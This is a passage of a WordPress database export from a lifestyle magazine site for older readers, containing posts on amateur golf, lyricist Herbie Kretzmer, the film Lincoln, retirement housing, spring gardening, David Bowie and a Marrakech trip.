style=\"text-align: center;\">“Golfing hacker” Peter Corrigan explains why he perseveres at golf – in spite of a handicap of 28.</h3>&#13;\n<p> </p>&#13;\n<p>The more haughty golfers tend to look down their noses at players like me because we are not very good at the game. They call us hackers on account of our progress around the course resembling someone trying to hack their way out of a jungle.</p>&#13;\n<p>More sensitive souls would probably give up the game but we hackers are a determined breed – and driven by a wild hope that one day we are going to improve. And, wonder upon wonder, we do improve occasionally, but the nature of golf is such that we soon slip back into bad habits.</p>&#13;\n<p>Undaunted, we persevere and acquire a resilience that protects us against despair – and, I promise you, despair is never far away from a person ill-fitted for the task of propelling a small ball in the right direction.</p>&#13;\n<p>But, however much we are mocked, we insist on donating to the world one priceless truth: that you don’t have to be good at something to enjoy it. Countless poor souls impoverish their lives for fear of making a fool of themselves.</p>&#13;\n<p>Whenever I set out to play a round – and it is at least twice a week when the course is not waterlogged – I feel I’m on an adventure, a journey into the unknown.</p>&#13;\n<p>Good golfers tend to know how they will fare. I don’t. I can play two or three holes very well and then launch into a sequence of such uncoordinated flays at the ball my score soars upwards.</p>&#13;\n<p>Yet I remain convinced that my next shot is going to be brilliant, and sometimes it is. Not frequently, but often enough to keep me ploughing on. There is no doubt that golf is the best game in the world to be bad at. And if you can remain philosophical about it there is pleasure to be had, even by the poorest of participants.</p>&#13;\n<p>This is by no means an original thought. That artful old hacker David Lloyd George remarked when he was prime minister 100 years ago: “Golf is the only game where the worst player gets the best of it. He obtains more out of it as regards exercise and enjoyment. The good player gets worried over the slightest mistake whereas the poor player makes too many mistakes to worry about them.”</p>&#13;\n<p>How true those words are, even today. Playing with some serious golfers can be a right misery, but laughter is never far away when I’m involved. Most of the laughs are aimed at me but I always join in – once I’ve stopped swearing.</p>&#13;\n<p>Of course, no-one takes up golf in order to be useless at it. The very essence of the game is a quest for improvement and I promise I have tried hard for many years.</p>&#13;\n<p>It hasn’t been a total failure. I have won the odd trophy and beaten some good players but, now in my seventies, my handicap has drifted to 28 which is the maximum. Ladies are allowed a maximum of 36 but it is not worth the operation.</p>&#13;\n<p>I entered this year with the firm resolution of bringing my handicap down and that is my intention. I had a serious operation last year and the fact I regularly play golf has undoubtedly helped my recovery.</p>&#13;\n<p>I think the operation might have had a beneficial effect on my swing. We’ll soon find out. The lousy weather has ruined golf for most in the past few months but, as you read this, I will be on a long visit to the United States where I’ll be watching and playing golf in Arizona and Florida. After that I’m going to Bermuda.</p>&#13;\n<p>That’s another good thing about golf; you can be bad at it in some of loveliest places in the world. And I can be relied upon to faithfully report on any atrocities I commit on my travels.</p>&#13;\n									</div>','I’m certain that golf is the best game in the world to be bad at','Golfing hacker Peter Corrigan explains why he perseveres at golf - in spite of a handicap of 28.   The more haughty golfers tend to look down their','publish','open','open','','im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at','','','2018-04-02 20:04:06','2018-04-02 20:04:06','',0,'http://westonspirit.org.uk/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at.asp',0,'post','',0),(260,1,'2016-10-23 23:08:00','2016-10-23 23:08:00','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">17 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Interview: Herbie Kretzmer, Les Miserables scriptwriter\" st_url=\"http://westonspirit.org.uk/2013/03/interview-herbie-kretzmer-les-miserables-scriptwriter/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Interview: Herbie Kretzmer, Les Miserables scriptwriter\" st_url=\"http://westonspirit.org.uk/2013/03/interview-herbie-kretzmer-les-miserables-scriptwriter/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Interview: Herbie Kretzmer, Les Miserables scriptwriter\" st_url=\"http://westonspirit.org.uk/2013/03/interview-herbie-kretzmer-les-miserables-scriptwriter/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Interview: Herbie Kretzmer, Les Miserables scriptwriter\" st_url=\"http://westonspirit.org.uk/2013/03/interview-herbie-kretzmer-les-miserables-scriptwriter/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Interview: Herbie Kretzmer, Les Miserables scriptwriter\" st_url=\"http://westonspirit.org.uk/2013/03/interview-herbie-kretzmer-les-miserables-scriptwriter/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"> </h3>&#13;\n<h3 style=\"text-align: center;\"><span style=\"font-size: 1.17em;\"><img class=\"alignnone size-medium wp-image-3229\" title=\"herbert350dpi\" src=\"/wp-content/uploads/2013/03/herbert350dpi-300x493.jpg\" alt=\"\" width=\"300\" height=\"493\" srcset=\"../../../wp-content/uploads/2013/03/herbert350dpi-300x493.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></span></h3>&#13;\n<h3 style=\"text-align: center;\"><span style=\"font-size: 1.17em;\">“It all happened because I made small talk with Charles Aznavour”, Herbie Kretzmer tells Alison Kervin.</span></h3>&#13;\n<p> </p>&#13;\n<p>Anne Hathaway lifted her award for best supporting actress high into the air and thanked her fans for their continuing support, then swept off the stage clutching her Bafta to her chest.</p>&#13;\n<p>She smiled for the cameras, posing in her elegant dress. Then she did something rather less predictable: she slipped her arm around an 87-year-old man called Herbie Kretzmer and kissed him lightly on the cheek. “You’re a star,” she told him. “A clever, shining star.”</p>&#13;\n<p>“What a lovely moment,” says Kretzmer, back in his Kensington home. “I imagine I blushed a bit – you know – she’s very attractive. She’s also very talented; she gave such a lovely performance in the film. I was so proud of her. And when we were having photographs taken, she kept putting her arm through mine to make sure I was OK. Probably worried I was going to collapse. I’m an old man, you know. An old man hanging out with the youngsters.”</p>&#13;\n<p>Kretzmer laughs to himself and, to be fair, the man has much to be jovial about. A few weeks after the delight of the Baftas, he looked on with pride as Les Misérables scooped three Oscars, including one for Hathaway.</p>&#13;\n<p>Without Kretzmer, Les Mis could well have been confined to a brief footnote in history. For he was the person who took Victor Hugo’s novel – and a two-hour long, mildly successful French version of the musical – and transformed it into a rambunctious, passionate and moving three-hour musical that captured the attention of the world. And he did it in six months.</p>&#13;\n<p>“I was 60 and living in a small flat on Basil Street in London, working for the Daily Mail, writing lyrics in my spare time. I didn’t think I’d ever leave journalism. I was a newspaper man – that’s what I did. But I did like lyrics, and the feeling of lyrics put to music. It always moved me. Not that I thought I’d be a great lyricist then – I was 60 for goodness sake. Then, one day, everything changed for ever.”</p>&#13;\n<p>Kretzmer’s world shifted on its axis in the strangest of circumstances. He was preparing to leave Cameron Mackintosh’s home after a disappointing meeting with the theatre impresario when the conversation took a fateful turn.</p>&#13;\n<p>“It was the mid-80s, and I’d written to Cameron to persuade him to get involved in a revival of a 60s musical called Our Man Crichton. I’d written the lyrics and thought it was due for a comeback.</p>&#13;\n<p>“Cameron wasn’t interested so I was leaving. Out of politeness and small talk he asked me what other songs I’d written. ‘I wrote She and Yesterday When I Was Young for Charles Aznavour,’ I explained. Cameron stopped and said, ‘My God. Really? You’ve just named two of my favourite songs.’ He looked delighted. But he still didn’t want to back a revival of my musical, so I left and went back to the office.</p>&#13;\n<p>“Six months later, he called me and said he’d woken up in the middle of the night and thought of me. He remembered the songs I’d written, and that I’d worked with Charles Aznavour … a Frenchman.</p>&#13;\n<p>“OK, I thought…this sounds strange. He asked me whether I could meet him for lunch at The Ivy. We met and he asked me to write the lyrics for Les Misérables. I devoted the next four weeks to reading Victor Hugo’s novel, in English, then said yes.”</p>&#13;\n<p>It wasn’t the easiest of projects, though. He was told the English version of Les Misérables would be a third longer than the French original, so Kretzmer had to add a new prologue, half a dozen new songs and then had to change the original French lyrics into English.</p>&#13;\n<p>“I don’t believe a song can be translated. I am a lyricist, not a translator. You have to write the song in English. I barely speak French anyway, so I was directed by Hugo’s original novel – I had the pages pinned up on the walls, and listening to the score – what was the music saying? What was Hugo saying? That’s what I had to write.”</p>&#13;\n<p>Kretzmer had to persuade his newspaper editor to allow him six months off before he could begin, and then locked himself away to write day and night.</p>&#13;\n<p>Les Mis opened to mixed reviews, but to popular public response. It’s now been running for more than 25 years, and has been seen by more than 60 million people. It’s the longest-running musical in the West End and the third-longest running Broadway musical. The lyrics are credited as one of the key reasons for the musical’s longevity.</p>&#13;\n<p>So what’s the lyricist’s favourite lyrics? “Very hard but, to be honest, I like Master Of The House rather a lot, because it hits exactly the right mood and does exactly what’s needed – it breaks the tension. It makes people laugh and relax which lifts the whole thing.”</p>&#13;\n<p>One of the most intriguing lyrics he wrote must be: “But the tigers come at night…” in I Dreamed A Dream. Where on earth does that come from? “Too much late-night working, probably,” he says. “I remember the thought of tigers coming into my head and I couldn’t get rid of it. It’s about dark forces which can creep up and destroy lives.”</p>&#13;\n<p>Nothing to do with William Blake’s poetry? “Ah – undoubtedly – that too: Tiger, tiger burning bright…that must have been another reason why I chose the image.”</p>&#13;\n<p>Now the film has brought the musical to a whole new audience. “I’m a big fan,” he says. “They’ve done a tremendous job. I went on to set twice, other than that I kept away, but I’m very fond of it.”</p>&#13;\n<p>One final question – has he ever met Susan Boyle? He laughs at this. “I haven’t, but she did wonders for the musical, didn’t she?” he says. “I’m sure she brought it to a whole new audience…like the film. I’m very grateful to her for that.”</p>&#13;\n<p>Kretzmer says his life has been “a joy and a delight” thanks to Les Mis. “I’m the kid who came to London from South Africa with just £150 in his pocket and made a great life for himself,” he says with a smile.</p>&#13;\n<p>“Hell, I’m nearly 90 and I was on the stage being kissed by a beautiful Hollywood actress a few weeks back. And what’s strange is that it all happened because Cameron Mackintosh and I made small-talk about Charles Aznavour.”</p>&#13;\n									</div>','Interview: Herbie Kretzmer, Les Miserables scriptwriter','\"It all happened because I made small talk with Charles Aznavour\", Herbie Kretzmer tells Alison Kervin.   Anne Hathaway lifted her award for best','publish','open','open','','interview-herbie-kretzmer-les-miserables-scriptwriter','','','2018-04-02 20:04:01','2018-04-02 20:04:01','',0,'http://westonspirit.org.uk/interview-herbie-kretzmer-les-miserables-scriptwriter.asp',0,'post','',0),(261,1,'2018-03-23 06:17:03','2018-03-23 06:17:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">20 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Lincoln: a story of struggle, sacrifice and some success\" st_url=\"http://westonspirit.org.uk/2013/03/lincoln-a-story-of-struggle-sacrifice-and-some-success/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Lincoln: a story of struggle, sacrifice and some success\" st_url=\"http://westonspirit.org.uk/2013/03/lincoln-a-story-of-struggle-sacrifice-and-some-success/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Lincoln: a story of struggle, sacrifice and some success\" st_url=\"http://westonspirit.org.uk/2013/03/lincoln-a-story-of-struggle-sacrifice-and-some-success/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Lincoln: a story of struggle, sacrifice and some success\" st_url=\"http://westonspirit.org.uk/2013/03/lincoln-a-story-of-struggle-sacrifice-and-some-success/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Lincoln: a story of struggle, sacrifice and some success\" st_url=\"http://westonspirit.org.uk/2013/03/lincoln-a-story-of-struggle-sacrifice-and-some-success/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"> </h3>&#13;\n<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3243\" title=\"Film Review Lincoln.JPEG-04\" src=\"/wp-content/uploads/2013/03/Film-Review-Lincoln.JPEG-04-300x377.jpg\" alt=\"\" width=\"300\" height=\"377\" />Abraham Lincoln’s fight to abolish slavery in America was cheated of an Oscar, says Peter Kervin.</h3>&#13;\n<p> </p>&#13;\n<p>First, a confession; I’m a hopeless geek when it comes to American presidents. I read about them, watch every documentary about them, and like to think I know a great deal about the inner and outer lives of every man who’s ever set foot in the White House.</p>&#13;\n<p>So it was with a little trepidation that I set out to watch Lincoln, the epic about the political machinations behind the outlawing of slavery. Would it be a dull and predictable re-hash of everything I’d previously read? I’m delighted to say that I found the film quite fascinating. It really is an intriguing masterclass in the political black arts.</p>&#13;\n<p>It reveals the political reality behind the abolition of slavery; bribery and blackmail are resorted to, rules are bent, people are coerced. Particularly memorable are the portrayals of the professional fixers-in-chief who conduct themselves with a breathtaking lack of concern for legality or morality.</p>&#13;\n<p>In his third Oscar-winning performance, Daniel Day-Lewis plays Lincoln. Rather, Daniel Day-Lewis <em>is</em> Lincoln. It is a remarkable portrayal of a man who endures immense pressure to achieve the greatest of goals. Lincoln was determined that the 700,000 deaths of the Civil War should not have been in vain. Slavery must end. An amendment to the constitution was necessary. But he had already tried that – the Senate had agreed to the 13th Amendment but the House of Representatives refused to pass it by the necessary two-thirds majority.</p>&#13;\n<p>The film is an insider’s account of how Lincoln sets about changing that vote in the White House.</p>&#13;\n<p>Lincoln struggles to make it all work. He ages with the weight to be carried and, unfortunately, his private life provides no refuge from the storm. His wife Mary, (played by Sally Field) does not emerge as a constant help in times of trouble. The death of their son, William, has scarred the family and now their eldest son, Robert, wants to join the army.</p>&#13;\n<p>The moment comes … we have grandstand seats in the House of Representatives as the crucial vote is to be taken. The votes are tallied, one by one. Eventually the result is announced: 119-56. Slavery is at an end.</p>&#13;\n<p>Lincoln has won both the Civil War and the 13th Amendment. But there is no ‘happily ever after.’ He lives for only five days after the end of the Civil War.</p>&#13;\n<p>Day-Lewis was the right Oscar choice for Best Actor. Argo was voted best film. Wrong choice: Lincoln was better.</p>&#13;\n									</div>','Lincoln: a story of struggle, sacrifice and some success','Abraham Lincoln\'s fight to abolish slavery in America was cheated of an Oscar, says Peter Kervin.   First, a confession; I’m a hopeless geek when','publish','open','open','','lincoln-a-story-of-struggle-sacrifice-and-some-success','','','2018-04-02 20:03:59','2018-04-02 20:03:59','',0,'http://westonspirit.org.uk/lincoln-a-story-of-struggle-sacrifice-and-some-success.asp',0,'post','',0),(262,1,'2016-10-13 03:02:20','2016-10-13 03:02:20','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">17 March 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Make the most of later life\" st_url=\"http://westonspirit.org.uk/2013/03/make-the-most-of-later-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Make the most of later life\" st_url=\"http://westonspirit.org.uk/2013/03/make-the-most-of-later-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Make the most of later life\" st_url=\"http://westonspirit.org.uk/2013/03/make-the-most-of-later-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Make the most of later life\" st_url=\"http://westonspirit.org.uk/2013/03/make-the-most-of-later-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Make the most of later life\" st_url=\"http://westonspirit.org.uk/2013/03/make-the-most-of-later-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h3 style=\"text-align: center;\">Abbeyfield’s mission to enhance the lives of older people.</h3>&#13;\n<p><img class=\" wp-image-3179 aligncenter\" title=\"Abbeyfield\" src=\"/wp-content/uploads/2013/03/Abbeyfield-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"../../../wp-content/uploads/2013/03/Abbeyfield-300x225.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>&#13;\n<p>Gym facilities and personal training at a development for older people; whatever next? At Abbeyfield’s new, forward-thinking scheme in Girton, Cambridge, fitness is just one of the wellbeing activities on offer.</p>&#13;\n<p>The UK population now includes some 12,000 centenarians. There are more people aged over 60 than there are people under 18 – and our aspirations for later life are very different to those of our parents. Abbeyfield, a charitable organisation with a mission to enhance the quality of life for older people, has embraced this challenge and has developed a solution which offers accommodation for today’s older people and for future generations. </p>&#13;\n<p>Our new communities for the over 55’s – such as Girton – are welcoming and spacious, offering individual apartments with a variety of tenure options, where style and function meet to offer residents home comforts, with access to different levels of support as their needs change. With a full programme of activities; a restaurant, which is open to non-residents; a café and shop run by residents; a wellbeing area; communal lounge and activity room, we can offer a safe environment that encourages independence, new friendships and, above all, quality of life.</p>&#13;\n<p>Keeping active is a vital part of our ethos for the wellbeing of older people. Girton, for example offers a gym and personal trainer, as well as a pool and spa, aimed at improving the health and mobility of many of the residents.</p>&#13;\n<p>The facilities are also open to members of the local community. Alongside classes in Tai Chi, seated tap dancing, circuit training, keep fit, and aqua fit, we also offer table tennis for the residents, introduced by popular demand, following the showing of the film Ping Pong in our on-site cinema.</p>&#13;\n<p>Girton’s residential trainer, Ian Batchelor says:  “We’re very proud of the facilities we can offer and the use of the gym, swimming pool and exercise classes have had a positive impact on the physical and mental wellbeing of the residents, as well as creating new friendships amongst gym-goers. </p>&#13;\n<p>“The opportunity to use specialised gym and hydrotherapy equipment has helped in the rehabilitation of residents with joint and muscular problems. </p>&#13;\n<p>“Our residents have told us that working on a one-to-one basis with a fitness trainer has really helped them to enjoy their physical activity programmes and classes.�?</p>&#13;\n<p>With the emphasis on independence, Abbeyfield’s new developments encourage older people to stay self-sufficient for as long as possible, while ensuring that support is available when and if it’s needed.</p>&#13;\n<p>Relationships flourish in our communities. Residents can participate in activities and hobbies, and there is even the opportunity to volunteer within the scheme, providing an extra dimension to enrich later life.</p>&#13;\n<p>As a charity with more than 50 years’ experience in helping people live well in later life – in more than 700 supported living houses and care homes – developments such as Girton Green are just one way in which Abbeyfield is offering older people a positive move. With a few remaining apartments for sale and rent, Abbeyfield welcomes enquiries from older people and their families.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<div>&#13;\n<p>01727 734128<br /><a href=\"http://www.abbeyfield.com/\" target=\"_blank\">www.abbeyfield.com</a></p>&#13;\n</div>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Make the most of later life','Abbeyfield’s mission to enhance the lives of older people. Gym facilities and personal training at a development for older people; whatever next? At','publish','open','open','','make-the-most-of-later-life','','','2018-04-02 20:03:58','2018-04-02 20:03:58','',0,'http://westonspirit.org.uk/make-the-most-of-later-life.asp',0,'post','',0),(263,1,'2015-02-13 09:48:15','2015-02-13 09:48:15','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 March 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Pottering around? Your garden will need a little more work after winter\" st_url=\"http://westonspirit.org.uk/2013/03/pottering-around-your-garden-will-need-a-little-more-work-after-winter/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Pottering around? Your garden will need a little more work after winter\" st_url=\"http://westonspirit.org.uk/2013/03/pottering-around-your-garden-will-need-a-little-more-work-after-winter/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Pottering around? Your garden will need a little more work after winter\" st_url=\"http://westonspirit.org.uk/2013/03/pottering-around-your-garden-will-need-a-little-more-work-after-winter/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Pottering around? Your garden will need a little more work after winter\" st_url=\"http://westonspirit.org.uk/2013/03/pottering-around-your-garden-will-need-a-little-more-work-after-winter/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Pottering around? Your garden will need a little more work after winter\" st_url=\"http://westonspirit.org.uk/2013/03/pottering-around-your-garden-will-need-a-little-more-work-after-winter/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3241\" title=\"begonia\" src=\"/wp-content/uploads/2013/03/begonia-300x311.jpg\" alt=\"\" width=\"300\" height=\"311\" /></h3>&#13;\n<h3 style=\"text-align: center;\">With the promise of springtime looming, it’s time to start preparing for the most important period in the gardening year. To get some tips on how to nurture your garden back to life, Nina Reschovsky speaks to Janson Lotery, director of Chelsea’s World Ends Nursery.</h3>&#13;\n<p> </p>&#13;\n<p>What can I do to ensure my soil composition is well-balanced this season?  </p>&#13;\n<p>Add manure, organic compost, bone meal and mulch. Add nutrients to the soil to replenish it.  A lot of the time, rain will leach the soil of its nutrients so it’s important to add fresh soil and nutrients to beds, boarders and containers.</p>&#13;\n<p>My garden is almost entirely in the shade, what plants can you recommend that don’t require much sun in order to survive?</p>&#13;\n<p>Camellias are good for the shade. They are one of the first plants to kick-start the year and they flower for a full three months. rhododendrons and begonias, below, are good, shady plants and will liven up your garden with some colour. Very shady ferns are also quite good, they don’t really flower but they’ll fill up those dark corners.</p>&#13;\n<p>For those lucky enough to have a garden with good sunlight, which plants would you recommend?</p>&#13;\n<p>All plants like sun, so the more sun you have, the more you can plant. If you have a garden that gets a lot of sunlight, you can plant virtually anything you want. Some popular flowers for sunny gardens include bluebells, tulips, daffodils, olive trees and perennials.</p>&#13;\n<p>What’s the most important piece of advice you could give me about my garden?  </p>&#13;\n<p>I would say that your work in the garden is never finished; there’s always something to be done.</p>&#13;\n									</div>','Pottering around? Your garden will need a little more work after winter','With the promise of springtime looming, it’s time to start preparing for the most important period in the gardening year. To get some tips on how to nurture','publish','open','open','','pottering-around-your-garden-will-need-a-little-more-work-after-winter','','','2018-04-02 20:03:56','2018-04-02 20:03:56','',0,'http://westonspirit.org.uk/pottering-around-your-garden-will-need-a-little-more-work-after-winter.asp',0,'post','',0),(264,1,'2014-12-24 21:35:03','2014-12-24 21:35:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">17 March 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"David Bowie: The golden years of rock and roll\" st_url=\"http://westonspirit.org.uk/2013/03/the-golden-years-of-rock-and-roll/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"David Bowie: The golden years of rock and roll\" st_url=\"http://westonspirit.org.uk/2013/03/the-golden-years-of-rock-and-roll/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"David Bowie: The golden years of rock and roll\" st_url=\"http://westonspirit.org.uk/2013/03/the-golden-years-of-rock-and-roll/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"David Bowie: The golden years of rock and roll\" st_url=\"http://westonspirit.org.uk/2013/03/the-golden-years-of-rock-and-roll/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"David Bowie: The golden years of rock and roll\" st_url=\"http://westonspirit.org.uk/2013/03/the-golden-years-of-rock-and-roll/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3227\" title=\"David Bowie\" src=\"/wp-content/uploads/2013/03/Bowie-p3-300x403.jpg\" alt=\"\" width=\"300\" height=\"403\" srcset=\"../../../wp-content/uploads/2013/03/Bowie-p3-300x403.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></h3>&#13;\n<h3 style=\"text-align: center;\">Whatever happened to live fast and die young? </h3>&#13;\n<p> </p>&#13;\n<p>Rock and roll was once a rebellion against adulthood, an ode to youth. In the 1965 song, My Generation, The Who’s Roger Daltrey famously sang: “I hope I die before I get old.”</p>&#13;\n<p>But, like many other rock stars of his day, Roger inevitably did get old (he’s 69 this month).</p>&#13;\n<p>In our youth-obsessed society where young people dominate pop culture, do the Roger Daltreys, Mick Jaggers and David Bowies of the world still hold a place?</p>&#13;\n<p>As it turns out, they do.</p>&#13;\n<p>To the delight of fans worldwide, David Bowie – who turned 66 in January and was long-presumed retired – released his first album in ten years on March 11, titled The Next Day. The immediate success of this album makes Bowie a leading light on a list of old rockers who just keep on going.</p>&#13;\n<p>The rocker’s timely return has sparked a huge demand for all things Bowie. In May of this year, a documentary about the singer’s life will air on BBC 2, and from March 23 to August 11, London’s V&amp;A museum will host a retrospective exhibition of his life, style and career.</p>&#13;\n<p>The  show has already sold a record 26,000 tickets, the museum’s highest-ever number of advance ticket sales.</p>&#13;\n<p>“David Bowie is a story of Britain and a bespoke 20th-century cultural history,” says Victoria Broakes, co-curator of the V&amp;A’s exhibit.</p>&#13;\n<p>“He is a pioneer not just in music, but also of rock theatre, videos, internet and digital downloads.</p>&#13;\n<p>“He took influences from an extraordinarily wide range of sources including Kabuki theatre, German Expressionism, film, William Burroughs, Andy Warhol, Nietzsche.</p>&#13;\n<p>“By absorbing ideas from around him and introducing them in his own innovative way to a very large number of people, he has had a huge impact on millions.</p>&#13;\n<p>“The breadth of Bowie’s interests and influences, the longevity of his career (spanning 50 years) and his cultural relevance now, gives him appeal to a very broad range of people.”</p>&#13;\n<p>As the years go on, Bowie continues to gain new fans from younger generations, thus increasing his popularity.</p>&#13;\n<p>“Bowie’s music is so ingrained within popular culture now, you would definitely struggle to find someone my age who hasn’t heard of him,” says Chris Taylor, a 25-year-old who has a degree in pop music and record production.</p>&#13;\n<p> “Growing up, my mum and dad would play Bowie around the house, so I fell in love with it from a young age. I think that’s how a lot of people from my generation got into him, through our parents.”</p>&#13;\n<p>Although most fans were ecstatic about the release of Bowie’s new album, many say that, in general, they prefer his classic hits.</p>&#13;\n<p>“It’s the original sound that made him so popular,” says John Patterson, the new vinyl manager at Flashback Records, a north London shop that specialises in both new release and classic vinyl records.</p>&#13;\n<p>“Bowie’s still popular because he was one of the classic acts of his generation that has influenced other artists,” continues Patterson. “At the end of the day, if most people were going to pick their favourite Bowie album, it’s not going to be this new one, it’s going to be Low, Heroes, Diamond Dogs or Ziggy Stardust.”</p>&#13;\n<p>That said, fans, both young and old continue to love Bowie and his music.</p>&#13;\n<p>“Throughout his career Bowie has transformed himself into many different characters,” says graduate Taylor.</p>&#13;\n<p>“It seems like with this most recent album, he is really just being himself – an ageing man who still has some great songs left in the bag. It’s great to hear his voice on something new.”</p>&#13;\n									</div>','David Bowie: The golden years of rock and roll','Whatever happened to live fast and die young?   Rock and roll was once a rebellion against adulthood, an ode to youth. In the 1965 song, My Generation,','publish','open','open','','david-bowie-the-golden-years-of-rock-and-roll','','','2018-04-02 20:03:55','2018-04-02 20:03:55','',0,'http://westonspirit.org.uk/david-bowie-the-golden-years-of-rock-and-roll.asp',0,'post','',0),(265,1,'2018-02-10 19:35:21','2018-02-10 19:35:21','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 March 2018</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\">&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The marvel of Marrakech\" st_url=\"http://westonspirit.org.uk/2013/03/the-marvel-of-marrakech/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The marvel of Marrakech\" st_url=\"http://westonspirit.org.uk/2013/03/the-marvel-of-marrakech/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The marvel of Marrakech\" st_url=\"http://westonspirit.org.uk/2013/03/the-marvel-of-marrakech/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The marvel of Marrakech\" st_url=\"http://westonspirit.org.uk/2013/03/the-marvel-of-marrakech/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The marvel of Marrakech\" st_url=\"http://westonspirit.org.uk/2013/03/the-marvel-of-marrakech/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3 style=\"text-align: center;\"><img class=\"alignnone size-medium wp-image-3231\" title=\"mosque\" src=\"/wp-content/uploads/2013/03/mosque-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" srcset=\"../../../wp-content/uploads/2013/03/mosque-300x199.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></h3>&#13;\n<h3 style=\"text-align: center;\">Nina Reschovsky discovers the quaint post-colonial charm of the North African city.</h3>&#13;\n<p> </p>&#13;\n<p>“What does Morocco mean to an Englishman?” asked George Orwell in his 1939 essay about the country’s dazzling imperial capital, Marrakech. “Camels, castles, palm-trees, Foreign Legionnaires, brass trays and bandits,” he concluded. Although almost 75 years have passed since Orwell described the myriad wonders of this enigmatic city, westerners are still flocking to Marrakech to experience the city’s vibrant culture, tantalising souks, hedonistic nightlife, opulent spas and temperate weather.</p>&#13;\n<p>Lured by the thought of such appealing attractions, my mother and I decided to celebrate her recent retirement with a weekend escape from London to this intriguing North African destination.</p>&#13;\n<p>In little over three hours and a glass of wine later, we found ourselves in the heart of a city whose rose-coloured walls preserve a picturesque, traditional livelihood. A place where the bustling roads sound of honking horns, of people shouting, singing, and haggling, and where the mazes of narrow streets and alleyways are crammed with livestock, donkey-drawn carts, men in long gowns, and merchants selling exotic goods. </p>&#13;\n<p>Within Riad El Mansour, our charming home for the weekend, however, we could all but forget the hectic ruckus of the city. 